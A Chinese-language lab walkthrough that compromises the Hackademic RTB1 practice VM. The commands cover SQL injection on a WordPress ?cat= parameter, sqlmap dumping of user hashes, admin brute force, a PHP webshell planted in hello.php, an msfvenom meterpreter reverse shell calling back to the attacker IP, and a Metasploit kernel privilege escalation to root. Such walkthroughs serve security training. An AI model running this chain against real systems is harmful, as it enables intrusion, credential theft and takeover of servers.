Kali和靶机都调整为NAT模式
kali上执行以下命令,发现靶机IP:
arp-scan -I eth0 -l
攻击机:192.168.64.131(kali)
靶机:192.168.64.149
对靶机IP扫描全端口,发现只有两个端口,但只有80端口开放
nmap -sS 192.168.64.149 -p 0-65535
通过wappalyzer得知网站的环境信息:
CMS:wordpress
语言解析环境:PHP
数据库:MYSQL
中间件:apache
在页面点击target,页面跳转后,再点击uncategonrized发现疑似存在sql注入点的url:http://192.168.64.149/Hackademic_RTB1/?cat=1
http://192.168.64.149/Hackademic_RTB1/?cat=2 页面内容如下:
目录扫描未发现有用的目录
页面延时5秒,确定存在注入点,数字型,无需闭合符。
http://192.168.64.149/Hackademic_RTB1/?cat=1 and sleep(5)
探测漏洞是否存在
sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1'
探测当前数据库
sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' --current-db
探测表名
sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' -D wordpress --tables
探测列名
sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' -D wordpress -T wp_users --columns
获取用户名
sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' -D wordpress -T wp_users -C user_login --dump
获取密码
sqlmap -u 'http://192.168.64.149/Hackademic_RTB1/?cat=1' -D wordpress -T wp_users -C user_pass --dump
访问后台默认目录wp_admin
http://192.168.64.149/Hackademic_RTB1/wp-admin
使用bp暴力破解,使用户名和密码一一对应
使用GeorgeMiller登录后台,用户权限最高
找到后台的可利用功能点
先用phpinfo测试,将hello.php的内容修改为<?php phpinfo();?>
访问后证明确实可用
修改为一句话木马
用哥斯拉进行连接
http://192.168.64.149/Hackademic_RTB1/wp-content/plugins/hello.php
查看系统内核
Unmae -a
制作linux木马
由于目标系统是32位的linux系统,因此选择payload时要选linux/x86的模块
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.64.131 LPORT=9999 -f elf > /var/www/html/shell.elf
上传木马
执行木马文件
Msf开启监听,获取权限
use exploit/multi/handler
set payload linux/x86/meterpreter_reverse_tcp
set lhost 192.168.64.131
set lport 9999
run
查找提权exp的模块
background
use post/multi/recon/local_exploit_suggester
set session 1
run
第五个模块可用
设置参数,获得会话,权限提升到root
use exploit/linux/local/rds_rds_page_copy_user_priv_esc
set session 1
set lhost 192.168.64.131
run
获得key.txt
cat /root/key.txt